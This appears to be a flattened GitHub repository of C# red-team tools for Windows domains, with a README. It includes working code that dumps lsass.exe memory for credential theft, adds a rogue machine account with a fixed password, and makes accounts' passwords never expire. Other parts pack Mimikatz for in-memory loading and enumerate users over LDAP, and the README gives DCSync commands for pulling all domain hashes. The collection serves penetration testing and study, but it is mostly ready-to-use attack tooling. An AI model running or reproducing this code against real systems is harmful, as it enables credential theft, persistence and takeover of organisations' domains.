├── AddMachineAccountofDomain.cs ├── Add_passwordneverexpires_user_byLDAP.cs ├── BrailleToASCII.cs ├── DcsyncofMimikatz.cs ├── DumpLsass.cs ├── GzipandBase64.cs ├── ListUserMailbyLDAP.cs ├── List_passwordneverexpires_user_byLDAP.cs ├── Office14-Microsoft.Office.Interop.OutlookMicrosoft.Office.Interop.Outlook.dll ├── Office15-Microsoft.Office.Interop.Outlook.dll ├── PELoaderofMimikatz.cs ├── README.md ├── ReadShellcode.cs ├── SSLCertScan.cs ├── SafetyKatz.cs ├── SerializeXamlToViewState.cs ├── SharpADFindDemo.cs ├── SharpDCSync.cs ├── SharpDCSync_krbtgt.cs ├── SharpExchangeBackdoor.cs ├── SharpExchangeDeserializeShell-NoAuth-ActivitySurrogateSelectorFromFile.cs ├── SharpExchangeDeserializeShell-NoAuth-Fromzcgonvh.cs ├── SharpExchangeDeserializeShell-NoAuth-ghostfile.cs ├── SharpExchangeDumpHash.cs ├── SharpGetUserLoginIPRPC.cs ├── SharpGetUserLoginIPWMI.cs ├── SharpMimikatz_x64.cs ├── SharpMimikatz_x86.cs ├── SharpPELoaderGenerater.cs ├── SharpSSHCheck_SSH.NET.cs ├── SharpSSHRunCmd_SSH.NET.cs ├── SharpTGTImporter.cs ├── Shellcode.cs ├── ShellcodeBase64.txt ├── SqlClient.cs ├── XamlToViewState.cs └── mapi_tool.cs /AddMachineAccountofDomain.cs: -------------------------------------------------------------------------------- 1 | /* 2 | Reference:https://github.com/pkb1s/SharpAllowedToAct 3 | This code is just part of SharpAllowedToAct. 4 | It can be used to add a Machine Account(User:testNew,Password:123456789). 5 | This code can be complied by csc.exe or Visual Studio. 6 | Supprot .Net 3.5 or later. 7 | Complie: 8 | C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe AddMachineAccountofDomain.cs /r:System.DirectoryServices.dll,System.DirectoryServices.Protocols.dll 9 | or 10 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe AddMachineAccountofDomain.cs /r:System.DirectoryServices.dll,System.DirectoryServices.Protocols.dll 11 | 12 | */ 13 | 14 | 15 | using System; 16 | using System.Text; 17 | using System.DirectoryServices; 18 | using System.Security.AccessControl; 19 | using System.Security.Principal; 20 | 21 | namespace AddMachineAccount 22 | { 23 | class Program 24 | { 25 | static void Main(string[] args) 26 | { 27 | String DomainController = ""; 28 | String Domain = ""; 29 | String MachineAccount = "testNew"; 30 | String DistinguishedName = ""; 31 | String password_cleartext = "123456789"; 32 | 33 | System.DirectoryServices.ActiveDirectory.Domain current_domain = null; 34 | if (DomainController == String.Empty || Domain == String.Empty) 35 | { 36 | try 37 | { 38 | current_domain = System.DirectoryServices.ActiveDirectory.Domain.GetCurrentDomain(); 39 | } 40 | catch 41 | { 42 | Console.WriteLine("[!] Cannot enumerate domain.\n"); 43 | return; 44 | } 45 | 46 | } 47 | 48 | if (DomainController == String.Empty) 49 | { 50 | DomainController = current_domain.PdcRoleOwner.Name; 51 | } 52 | 53 | if (Domain == String.Empty) 54 | { 55 | Domain = current_domain.Name; 56 | } 57 | 58 | Domain = Domain.ToLower(); 59 | 60 | String machine_account = MachineAccount; 61 | String sam_account = ""; 62 | if (MachineAccount.EndsWith("$")) 63 | { 64 | sam_account = machine_account; 65 | machine_account = machine_account.Substring(0, machine_account.Length - 1); 66 | } 67 | else 68 | { 69 | sam_account = machine_account + "$"; 70 | } 71 | 72 | 73 | String distinguished_name = DistinguishedName; 74 | String victim_distinguished_name = DistinguishedName; 75 | String[] DC_array = null; 76 | 77 | distinguished_name = "CN=" + machine_account + ",CN=Computers"; 78 | DC_array = Domain.Split('.'); 79 | 80 | foreach (String DC in DC_array) 81 | { 82 | distinguished_name += ",DC=" + DC; 83 | victim_distinguished_name += ",DC=" + DC; 84 | } 85 | 86 | Console.WriteLine("[+] Domain = " + Domain); 87 | Console.WriteLine("[+] Domain Controller = " + DomainController); 88 | Console.WriteLine("[+] New SAMAccountName = " + sam_account); 89 | Console.WriteLine("[+] Distinguished Name = " + distinguished_name); 90 | 91 | System.DirectoryServices.Protocols.LdapDirectoryIdentifier identifier = new System.DirectoryServices.Protocols.LdapDirectoryIdentifier(DomainController, 389); 92 | System.DirectoryServices.Protocols.LdapConnection connection = null; 93 | 94 | connection = new System.DirectoryServices.Protocols.LdapConnection(identifier); 95 | 96 | connection.SessionOptions.Sealing = true; 97 | connection.SessionOptions.Signing = true; 98 | connection.Bind(); 99 | 100 | var request = new System.DirectoryServices.Protocols.AddRequest(distinguished_name, new System.DirectoryServices.Protocols.DirectoryAttribute[] { 101 | new System.DirectoryServices.Protocols.DirectoryAttribute("DnsHostName", machine_account +"."+ Domain), 102 | new System.DirectoryServices.Protocols.DirectoryAttribute("SamAccountName", sam_account), 103 | new System.DirectoryServices.Protocols.DirectoryAttribute("userAccountControl", "4096"), 104 | new System.DirectoryServices.Protocols.DirectoryAttribute("unicodePwd", Encoding.Unicode.GetBytes("\"" + password_cleartext + "\"")), 105 | new System.DirectoryServices.Protocols.DirectoryAttribute("objectClass", "Computer"), 106 | new System.DirectoryServices.Protocols.DirectoryAttribute("ServicePrincipalName", "HOST/"+machine_account+"."+Domain,"RestrictedKrbHost/"+machine_account+"."+Domain,"HOST/"+machine_account,"RestrictedKrbHost/"+machine_account) 107 | 108 | }); 109 | 110 | try 111 | { 112 | connection.SendRequest(request); 113 | Console.WriteLine("[+] Machine account " + machine_account + " added"); 114 | } 115 | catch (System.Exception ex) 116 | { 117 | Console.WriteLine("[-] The new machine could not be created! User may have reached ms-DS-MachineAccountQuota limit.)"); 118 | Console.WriteLine("[-] Exception: " + ex.Message); 119 | return; 120 | } 121 | 122 | } 123 | 124 | } 125 | } 126 | 127 | 128 | -------------------------------------------------------------------------------- /Add_passwordneverexpires_user_byLDAP.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.DirectoryServices; 6 | 7 | namespace Add_passwordneverexpires_user_byLDAP 8 | { 9 | class Program 10 | { 11 | static void ShowUsage() 12 | { 13 | string Usage = @" 14 | Add_passwordneverexpires_user_byLDAP 15 | Use to set the selected user with password_never_expires by LDAP. 16 | Complie: 17 | C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe Add_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll 18 | or 19 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Add_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll 20 | Usage: 21 | Add_passwordneverexpires_user_byLDAP 22 | Eg: 23 | Add_passwordneverexpires_user_byLDAP.exe 192.168.1.1 administrator password1 test1 24 | "; 25 | Console.WriteLine(Usage); 26 | } 27 | 28 | static void Main(string[] args) 29 | { 30 | if (args.Length != 4) 31 | { 32 | ShowUsage(); 33 | System.Environment.Exit(0); 34 | } 35 | try 36 | { 37 | DirectoryEntry entry = new DirectoryEntry("LDAP://" + args[0], args[1], args[2]); 38 | //When you are in the domain 39 | //DirectoryEntry de = new DirectoryEntry("LDAP://" + args[0]); 40 | 41 | DirectorySearcher deSearch = new DirectorySearcher(entry); 42 | deSearch.Filter = "(&(&(objectCategory=person)(objectClass=user))(sAMAccountName=" + args[3] + "))"; 43 | deSearch.SearchScope = SearchScope.Subtree; 44 | 45 | SearchResult result = deSearch.FindOne(); 46 | entry = new DirectoryEntry(result.Path, args[1], args[2]); 47 | //When you are in the domain 48 | //DirectoryEntry de = new DirectoryEntry("LDAP://" + args[0]); 49 | 50 | Console.WriteLine("[*] Querying: {0}", deSearch.Filter); 51 | Console.WriteLine("[+] samaccountname: {0}", entry.Properties["samaccountname"][0]); 52 | int NON_EXPIRE_FLAG = 0x10000; 53 | int x = (int)entry.Properties["userAccountControl"].Value; 54 | Console.WriteLine(" userAccountControl: {0}", x); 55 | Console.WriteLine("[*] Trying to set userAccountControl"); 56 | entry.Properties["userAccountControl"].Value = x | NON_EXPIRE_FLAG; 57 | entry.CommitChanges(); 58 | 59 | result = deSearch.FindOne(); 60 | entry = new DirectoryEntry(result.Path, args[1], args[2]); 61 | //When you are in the domain 62 | //DirectoryEntry de = new DirectoryEntry("LDAP://" + args[0]); 63 | 64 | int y = (int)entry.Properties["userAccountControl"].Value; 65 | Console.WriteLine("[+] samaccountname: {0}", entry.Properties["samaccountname"][0]); 66 | Console.WriteLine(" userAccountControl(new): {0}", y); 67 | } 68 | catch (Exception e) 69 | { 70 | Console.WriteLine("[!] ERROR: {0}", e.Message); 71 | } 72 | } 73 | } 74 | } -------------------------------------------------------------------------------- /BrailleToASCII.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Text; 3 | 4 | namespace BrailleToASCII 5 | { 6 | class Program 7 | { 8 | public static string StringToUnicode(string source) 9 | { 10 | var bytes = Encoding.Unicode.GetBytes(source); 11 | var stringBuilder = new StringBuilder(); 12 | for (var i = 0; i < bytes.Length; i += 2) 13 | { 14 | stringBuilder.AppendFormat("\\u{0:x2}{1:x2}", bytes[i + 1], bytes[i]); 15 | } 16 | return stringBuilder.ToString(); 17 | } 18 | public static string BrailleToASCII(string str) 19 | { 20 | string tempstr = null; 21 | string[] arr = str.Split('\\'); 22 | for (int x = 1; x < arr.Length; x++) 23 | { 24 | 25 | if (arr[x] == "u283c") 26 | { 27 | x++; 28 | if (arr[x] == "u2801") 29 | tempstr += "1"; 30 | else if (arr[x] == "u2803") 31 | tempstr += "2"; 32 | else if (arr[x] == "u2809") 33 | tempstr += "3"; 34 | else if (arr[x] == "u2819") 35 | tempstr += "4"; 36 | else if (arr[x] == "u2811") 37 | tempstr += "5"; 38 | else if (arr[x] == "u280b") 39 | tempstr += "6"; 40 | else if (arr[x] == "u281b") 41 | tempstr += "7"; 42 | else if (arr[x] == "u2813") 43 | tempstr += "8"; 44 | else if (arr[x] == "u280a") 45 | tempstr += "9"; 46 | else if (arr[x] == "u281a") 47 | tempstr += "0"; 48 | else 49 | Console.WriteLine("[!]Bad character:" + arr[x - 1] + arr[x] + ",index:" + (x-1)); 50 | } 51 | else if (arr[x] == "u2820") 52 | { 53 | x++; 54 | if (arr[x] == "u2801") 55 | tempstr += "A"; 56 | else if (arr[x] == "u2803") 57 | tempstr += "B"; 58 | else if (arr[x] == "u2809") 59 | tempstr += "C"; 60 | else if (arr[x] == "u2819") 61 | tempstr += "D"; 62 | else if (arr[x] == "u2811") 63 | tempstr += "E"; 64 | else if (arr[x] == "u280b") 65 | tempstr += "F"; 66 | else if (arr[x] == "u281b") 67 | tempstr += "G"; 68 | else if (arr[x] == "u2813") 69 | tempstr += "H"; 70 | else if (arr[x] == "u280a") 71 | tempstr += "I"; 72 | else if (arr[x] == "u281a") 73 | tempstr += "J"; 74 | else if (arr[x] == "u2805") 75 | tempstr += "K"; 76 | else if (arr[x] == "u2807") 77 | tempstr += "L"; 78 | else if (arr[x] == "u280d") 79 | tempstr += "M"; 80 | else if (arr[x] == "u281d") 81 | tempstr += "N"; 82 | else if (arr[x] == "u2815") 83 | tempstr += "O"; 84 | else if (arr[x] == "u280f") 85 | tempstr += "P"; 86 | else if (arr[x] == "u281f") 87 | tempstr += "Q"; 88 | else if (arr[x] == "u2817") 89 | tempstr += "R"; 90 | else if (arr[x] == "u280e") 91 | tempstr += "S"; 92 | else if (arr[x] == "u281e") 93 | tempstr += "T"; 94 | else if (arr[x] == "u2825") 95 | tempstr += "U"; 96 | else if (arr[x] == "u2827") 97 | tempstr += "V"; 98 | else if (arr[x] == "u283a") 99 | tempstr += "W"; 100 | else if (arr[x] == "u282d") 101 | tempstr += "X"; 102 | else if (arr[x] == "u283d") 103 | tempstr += "Y"; 104 | else if (arr[x] == "u2835") 105 | tempstr += "Z"; 106 | else 107 | Console.WriteLine("[!]Bad character:" + arr[x - 1] + arr[x] + ",index:" + (x-1)); 108 | } 109 | else if (arr[x] == "u2801") 110 | tempstr += "a"; 111 | else if (arr[x] == "u2803") 112 | tempstr += "b"; 113 | else if (arr[x] == "u2809") 114 | tempstr += "c"; 115 | else if (arr[x] == "u2819") 116 | tempstr += "d"; 117 | else if (arr[x] == "u2811") 118 | tempstr += "e"; 119 | else if (arr[x] == "u280b") 120 | tempstr += "f"; 121 | else if (arr[x] == "u281b") 122 | tempstr += "g"; 123 | else if (arr[x] == "u2813") 124 | tempstr += "h"; 125 | else if (arr[x] == "u280a") 126 | tempstr += "i"; 127 | else if (arr[x] == "u281a") 128 | tempstr += "j"; 129 | else if (arr[x] == "u2805") 130 | tempstr += "k"; 131 | else if (arr[x] == "u2807") 132 | tempstr += "l"; 133 | else if (arr[x] == "u280d") 134 | tempstr += "m"; 135 | else if (arr[x] == "u281d") 136 | tempstr += "n"; 137 | else if (arr[x] == "u2815") 138 | tempstr += "o"; 139 | else if (arr[x] == "u280f") 140 | tempstr += "p"; 141 | else if (arr[x] == "u281f") 142 | tempstr += "q"; 143 | else if (arr[x] == "u2817") 144 | tempstr += "r"; 145 | else if (arr[x] == "u280e") 146 | tempstr += "s"; 147 | else if (arr[x] == "u281e") 148 | tempstr += "t"; 149 | else if (arr[x] == "u2825") 150 | tempstr += "u"; 151 | else if (arr[x] == "u2827") 152 | tempstr += "v"; 153 | else if (arr[x] == "u283a") 154 | tempstr += "w"; 155 | else if (arr[x] == "u282d") 156 | tempstr += "x"; 157 | else if (arr[x] == "u283d") 158 | tempstr += "y"; 159 | else if (arr[x] == "u2835") 160 | tempstr += "z"; 161 | else if (arr[x] == "u2836") 162 | tempstr += ")"; 163 | else if (arr[x] == "u2802") 164 | tempstr += ","; 165 | else if (arr[x] == "u2816") 166 | tempstr += "!"; 167 | else if (arr[x] == "u280c") 168 | tempstr += "/"; 169 | else if (arr[x] == "u2824") 170 | tempstr += "-"; 171 | else if (arr[x] == "u2832") 172 | tempstr += "."; 173 | else if (arr[x] == "u2826") 174 | tempstr += "?"; 175 | else if (arr[x] == "u2806") 176 | tempstr += ";"; 177 | else if (arr[x] == "u2804") 178 | tempstr += "'"; 179 | else if (arr[x] == "u2832") 180 | tempstr += "$"; 181 | else if (arr[x] == "u002b") 182 | tempstr += "+"; 183 | else if (arr[x] == "u003d") 184 | tempstr += "="; 185 | else 186 | Console.WriteLine("[!]Bad character:" + arr[x] + ",index:" + x); 187 | } 188 | return tempstr; 189 | } 190 | 191 | static void Main(string[] args) 192 | { 193 | string str = "⠼⠁⠼⠃⠼⠉⠼⠙⠼⠑⠼⠋⠼⠛⠼⠓⠼⠊⠼⠚⠁⠃⠉⠙⠑⠋⠛⠓⠊⠚⠅⠇⠍⠝⠕⠏⠟⠗⠎⠞⠥⠧⠺⠭⠽⠵⠠⠁⠠⠃⠠⠉⠠⠙⠠⠑⠠⠋⠠⠛⠠⠓⠠⠊⠠⠚⠠⠅⠠⠇⠠⠍⠠⠝⠠⠕⠠⠏⠠⠟⠠⠗⠠⠎⠠⠞⠠⠥⠠⠧⠠⠺⠠⠭⠠⠽⠠⠵⠶⠂⠖⠌⠤⠲⠦⠆⠄⠲"; 194 | string unistr = StringToUnicode(str); 195 | string result = BrailleToASCII(unistr); 196 | Console.WriteLine(result); 197 | 198 | } 199 | } 200 | } 201 | -------------------------------------------------------------------------------- /DumpLsass.cs: -------------------------------------------------------------------------------- 1 | //Source:https://github.com/GhostPack/SafetyKatz 2 | //Remove some functions of the source code,only used of dumping lsass.exe to the current path. 3 | 4 | using System; 5 | using System.Runtime.InteropServices; 6 | using System.Diagnostics; 7 | using System.IO; 8 | using System.Security.Principal; 9 | 10 | namespace DumpLsass 11 | { 12 | class Program 13 | { 14 | [DllImport("dbghelp.dll", EntryPoint = "MiniDumpWriteDump", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Unicode, ExactSpelling = true, SetLastError = true)] 15 | static extern bool MiniDumpWriteDump(IntPtr hProcess, uint processId, SafeHandle hFile, uint dumpType, IntPtr expParam, IntPtr userStreamParam, IntPtr callbackParam); 16 | 17 | public static bool IsHighIntegrity() 18 | { 19 | // returns true if the current process is running with adminstrative privs in a high integrity context 20 | WindowsIdentity identity = WindowsIdentity.GetCurrent(); 21 | WindowsPrincipal principal = new WindowsPrincipal(identity); 22 | return principal.IsInRole(WindowsBuiltInRole.Administrator); 23 | } 24 | 25 | public static void Minidump() 26 | { 27 | IntPtr targetProcessHandle = IntPtr.Zero; 28 | uint targetProcessId = 0; 29 | 30 | Process targetProcess = null; 31 | 32 | Process[] processes = Process.GetProcessesByName("lsass"); 33 | targetProcess = processes[0]; 34 | 35 | try 36 | { 37 | targetProcessId = (uint)targetProcess.Id; 38 | targetProcessHandle = targetProcess.Handle; 39 | } 40 | catch (Exception ex) 41 | { 42 | Console.WriteLine(String.Format("\n[X] Error getting handle to {0} ({1}): {2}\n", targetProcess.ProcessName, targetProcess.Id, ex.Message)); 43 | return; 44 | } 45 | bool bRet = false; 46 | 47 | string dumpFile = "lsass.dmp"; 48 | 49 | Console.WriteLine(String.Format("\n[*] Dumping {0} ({1}) to {2}", targetProcess.ProcessName, targetProcess.Id, dumpFile)); 50 | 51 | using (FileStream fs = new FileStream(dumpFile, FileMode.Create, FileAccess.ReadWrite, FileShare.Write)) 52 | { 53 | bRet = MiniDumpWriteDump(targetProcessHandle, targetProcessId, fs.SafeFileHandle, (uint)2, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero); 54 | } 55 | 56 | // if successful 57 | if (bRet) 58 | { 59 | Console.WriteLine("[+] Dump successful!"); 60 | } 61 | else 62 | { 63 | Console.WriteLine(String.Format("[X] Dump failed: {0}", bRet)); 64 | } 65 | } 66 | static void Main(string[] args) 67 | { 68 | 69 | if (!IsHighIntegrity()) 70 | { 71 | Console.WriteLine("\n[X] Not in high integrity, unable to grab a handle to lsass!\n"); 72 | } 73 | else 74 | { 75 | Minidump(); 76 | 77 | } 78 | } 79 | } 80 | } 81 | 82 | 83 | 84 | -------------------------------------------------------------------------------- /GzipandBase64.cs: -------------------------------------------------------------------------------- 1 | //Use to generate the KatzCompressed string in PELoaderofMimikatz.cs 2 | //Complie: 3 | //C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe GzipandBase64.cs 4 | //or 5 | //C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe GzipandBase64.cs 6 | using System; 7 | using System.IO; 8 | using System.IO.Compression; 9 | namespace GzipandBase64 10 | { 11 | class Program 12 | { 13 | static byte[] Compress(byte[] raw) 14 | { 15 | using (MemoryStream memory = new MemoryStream()) 16 | { 17 | using (GZipStream gzip = new GZipStream(memory, 18 | CompressionMode.Compress, true)) 19 | { 20 | gzip.Write(raw, 0, raw.Length); 21 | } 22 | return memory.ToArray(); 23 | } 24 | } 25 | static void Main(string[] args) 26 | { 27 | byte[] AsBytes = File.ReadAllBytes(@"mimikatz.exe"); 28 | byte[] compress = Compress(AsBytes); 29 | 30 | String AsBase64String = Convert.ToBase64String(compress); 31 | StreamWriter sw = new StreamWriter(@"base64.txt"); 32 | sw.Write(AsBase64String); 33 | sw.Close(); 34 | } 35 | } 36 | } 37 | -------------------------------------------------------------------------------- /ListUserMailbyLDAP.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.DirectoryServices; 6 | 7 | namespace ListUserMailbyLDAP 8 | { 9 | class Program 10 | { 11 | static void ShowUsage() 12 | { 13 | string Usage = @" 14 | GetMailbyLDAP 15 | Use to export all users' mail by LDAP. 16 | Modified from https://github.com/Mr-Un1k0d3r/RedTeamCSharpScripts/blob/master/enumerateuser.cs 17 | Complie: 18 | C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe ListUserMailbyLDAP.cs /r:System.DirectoryServices.dll 19 | or 20 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe ListUserMailbyLDAP.cs /r:System.DirectoryServices.dll 21 | Usage: 22 | ListUserMailbyLDAP 23 | Eg: 24 | ListUserMailbyLDAP.exe 192.168.1.1 test1 password1 25 | "; 26 | Console.WriteLine(Usage); 27 | } 28 | 29 | 30 | static void Main(string[] args) 31 | { 32 | if (args.Length != 3) 33 | { 34 | ShowUsage(); 35 | System.Environment.Exit(0); 36 | } 37 | try 38 | { 39 | string q = "(&(objectCategory=User))"; 40 | Console.WriteLine("[*] Querying LDAP://{0}", args[0]); 41 | Console.WriteLine("[*] Querying: {0}", q); 42 | DirectoryEntry de = new DirectoryEntry("LDAP://" + args[0],args[1],args[2]); 43 | DirectorySearcher ds = new DirectorySearcher(de); 44 | ds.Filter = q; 45 | foreach (SearchResult r in ds.FindAll()) 46 | { 47 | Console.WriteLine("User:" + r.Properties["samaccountname"][0]); 48 | if(r.Properties["mail"].Count > 0) 49 | Console.WriteLine("Mail:" + r.Properties["mail"][0]); 50 | Console.WriteLine("whencreated:" + r.Properties["whencreated"][0]); 51 | Console.WriteLine("pwdlastset:" + r.Properties["pwdlastset"][0]); 52 | if(r.Properties["accountexpires"][0].ToString()== "9223372036854775807") 53 | Console.WriteLine("accountexpires:Never"); 54 | else 55 | Console.WriteLine("accountexpires:" + r.Properties["accountexpires"][0]); 56 | Console.WriteLine("lastlogon:" + r.Properties["lastlogon"][0]); 57 | Console.WriteLine("---"); 58 | } 59 | } 60 | catch (Exception e) 61 | { 62 | Console.WriteLine("[!] ERROR: {0}", e.Message); 63 | } 64 | } 65 | } 66 | } 67 | -------------------------------------------------------------------------------- /List_passwordneverexpires_user_byLDAP.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.DirectoryServices; 6 | 7 | namespace List_passwordneverexpires_user_byLDAP 8 | { 9 | class Program 10 | { 11 | static void ShowUsage() 12 | { 13 | string Usage = @" 14 | List_passwordneverexpires_user_byLDAP 15 | Use to export all users with password_never_expires by LDAP. 16 | Complie: 17 | C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe List_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll 18 | or 19 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe List_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll 20 | Usage: 21 | List_passwordneverexpires_user_byLDAP 22 | Eg: 23 | List_passwordneverexpires_user_byLDAP.exe 192.168.1.1 test1 password1 24 | "; 25 | Console.WriteLine(Usage); 26 | } 27 | 28 | 29 | static void Main(string[] args) 30 | { 31 | if (args.Length != 3) 32 | { 33 | ShowUsage(); 34 | System.Environment.Exit(0); 35 | } 36 | try 37 | { 38 | string q = "(&(objectCategory=User))"; 39 | Console.WriteLine("[*] Querying LDAP://{0}", args[0]); 40 | Console.WriteLine("[*] Querying: {0}", q); 41 | DirectoryEntry de = new DirectoryEntry("LDAP://" + args[0],args[1],args[2]); 42 | //When you are in the domain 43 | //DirectoryEntry de = new DirectoryEntry("LDAP://" + args[0]); 44 | DirectorySearcher ds = new DirectorySearcher(de); 45 | ds.Filter = q; 46 | Console.WriteLine("[*] Export all users with password_never_expires"); 47 | foreach (SearchResult r in ds.FindAll()) 48 | { 49 | int x = Convert.ToInt32(r.Properties["useraccountcontrol"][0]); 50 | if((x & 0x10000) == 0x10000) 51 | Console.WriteLine(r.Properties["samaccountname"][0]); 52 | } 53 | } 54 | catch (Exception e) 55 | { 56 | Console.WriteLine("[!] ERROR: {0}", e.Message); 57 | } 58 | } 59 | } 60 | } 61 | -------------------------------------------------------------------------------- /Office14-Microsoft.Office.Interop.OutlookMicrosoft.Office.Interop.Outlook.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/Homework-of-C-Sharp/6ab29ba191b8f5028138d11dcc84998e495c76f8/Office14-Microsoft.Office.Interop.OutlookMicrosoft.Office.Interop.Outlook.dll -------------------------------------------------------------------------------- /Office15-Microsoft.Office.Interop.Outlook.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/Homework-of-C-Sharp/6ab29ba191b8f5028138d11dcc84998e495c76f8/Office15-Microsoft.Office.Interop.Outlook.dll -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Homework-of-C-Sharp 2 | C Sharp codes of my blog. 3 | 4 | --- 5 | 6 | ### Shellcode.cs 7 | 8 | Use CreateThread to run shellcode. 9 | 10 | ### ShellcodeBase64.txt 11 | 12 | Base64 of the shellcode(msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -f csharp) 13 | 14 | ### ReadShellcode.cs 15 | 16 | It will read ShellcodeBase64.txt and launch the shellcode. 17 | 18 | --- 19 | 20 | ### DumpLsass.cs 21 | 22 | Source code is https://github.com/GhostPack/SafetyKatz 23 | 24 | Remove some functions of the source code,only used of dumping lsass.exe to the current path. 25 | 26 | Complie: 27 | 28 | `C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe DumpLsass.cs` 29 | 30 | or 31 | 32 | `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe DumpLsass.cs` 33 | 34 | 35 | ### SafetyKatz.cs 36 | 37 | Use to run `sekurlsa::logonpasswords` and `sekurlsa::ekeys` on the minidump file of lsass.exe. 38 | 39 | All code from https://github.com/GhostPack/SafetyKatz 40 | 41 | I just modified a few lines of code so that it can be compiled by csc.exe. 42 | 43 | Eg. 44 | 45 | `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SafetyKatz.cs /unsafe` 46 | 47 | or 48 | 49 | `C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SafetyKatz.cs /unsafe` 50 | 51 | --- 52 | 53 | ### GzipandBase64.cs 54 | 55 | Use to generate the KatzCompressed string in PELoaderofMimikatz.cs 56 | 57 | Complie: 58 | 59 | `C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe GzipandBase64.cs` 60 | 61 | or 62 | 63 | `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe GzipandBase64.cs` 64 | 65 | ### PELoaderofMimikatz.cs 66 | 67 | The source file is Casey Smith's PELoader.cs and the version of mimikatz is mimikatz 2.0 alpha (x64) release "Kiwi en C" (Aug 17 2015 00:14:48). 68 | 69 | I change it to the new version(mimikatz 2.1.1 (x64) built on Sep 25 2018 15:08:14). 70 | 71 | The source code supprot 4.0 or later. 72 | 73 | This code supprot 3.5 or later. 74 | 75 | Complie: 76 | 77 | `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe PELoaderofMimikatz.cs` 78 | 79 | or 80 | 81 | `C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe /unsafe PELoaderofMimikatz.cs` 82 | 83 | ### DcsyncofMimikatz.cs 84 | 85 | This is the dcsync mode extracted from Mimikatz. 86 | 87 | The source code in KatzCompressed is https://github.com/3gstudent/test/blob/master/Mimkatz-dcsync.zip 88 | 89 | You can use https://github.com/3gstudent/Homework-of-C-Sharp/blob/master/GzipandBase64.cs to generate the KatzCompressed string. 90 | 91 | The source code supprot 4.0 or later. 92 | 93 | This code supprot 3.5 or later. 94 | 95 | Complie: 96 | 97 | `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe DcsyncofMimikatz.cs` 98 | 99 | or 100 | 101 | `C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe /unsafe DcsyncofMimikatz.cs` 102 | 103 | Usage: 104 | 105 | `DcsyncofMimikatz.exe log "lsadump::dcsync /domain:test.com /all /csv" exit` 106 | 107 | `DcsyncofMimikatz.exe log "lsadump::dcsync /domain:test.com /user:administrator /csv" exit` 108 | 109 | --- 110 | 111 | ### SharpMimikatz_x86.cs 112 | 113 | Reference:Casey Smith's PELoader.cs 114 | 115 | The source file is Casey Smith's PELoader.cs and the version of mimikatz is mimikatz 2.0 alpha (x64) release "Kiwi en C" (Aug 17 2015 00:14:48). 116 | 117 | I change it to the new version(mimikatz 2.1.1 (x64) built on Sep 25 2018 15:08:14). 118 | 119 | The source code supprot 4.0 or later. 120 | 121 | This code supprot 3.5 or later. 122 | 123 | This is a 32-bit version. 124 | 125 | Complie: 126 | 127 | `C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /unsafe /platform:x86 SharpMimikatz_x86.cs` 128 | 129 | or 130 | 131 | `C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe /unsafe /platform:x86 SharpMimikatz_x86.cs` 132 | 133 | Usage: 134 | 135 | `SharpMimikatz_x86.exe coffee exit` 136 | 137 | ### SharpMimikatz_x64.cs 138 | 139 | Reference:Casey Smith's PELoader.cs 140 | 141 | The source file is Casey Smith's PELoader.cs and the version of mimikatz is mimikatz 2.0 alpha (x64) release "Kiwi en C" (Aug 17 2015 00:14:48). 142 | 143 | I change it to the new version(mimikatz 2.1.1 (x64) built on Sep 25 2018 15:08:14). 144 | 145 | The source code supprot 4.0 or later. 146 | 147 | This code supprot 3.5 or later. 148 | 149 | This is a 64-bit version. 150 | 151 | Complie: 152 | 153 | `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /platform:x64 SharpMimikatz_x64.cs` 154 | 155 | or 156 | 157 | `C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe /unsafe /platform:x64 SharpMimikatz_x64.cs` 158 | 159 | Usage: 160 | 161 | `SharpMimikatz_x64.exe coffee exit` 162 | 163 | ### SharpPELoaderGenerater.cs 164 | 165 | Use to generate SharpPELoader.cs 166 | 167 | Modified by 3gstudent 168 | 169 | Reference:Casey Smith's PELoader.cs 170 | 171 | Usage: 172 | 173 | `SharpPELoaderGenerater.exe ` 174 | 175 | Eg. 176 | 177 | `SharpPELoaderGenerater.exe mimikatz.exe` 178 | 179 | SharpPELoaderGenerater will determine whether the exe is 32-bit or 64-bit and then generate the corresponding code. 180 | 181 | More details: 182 | 183 | 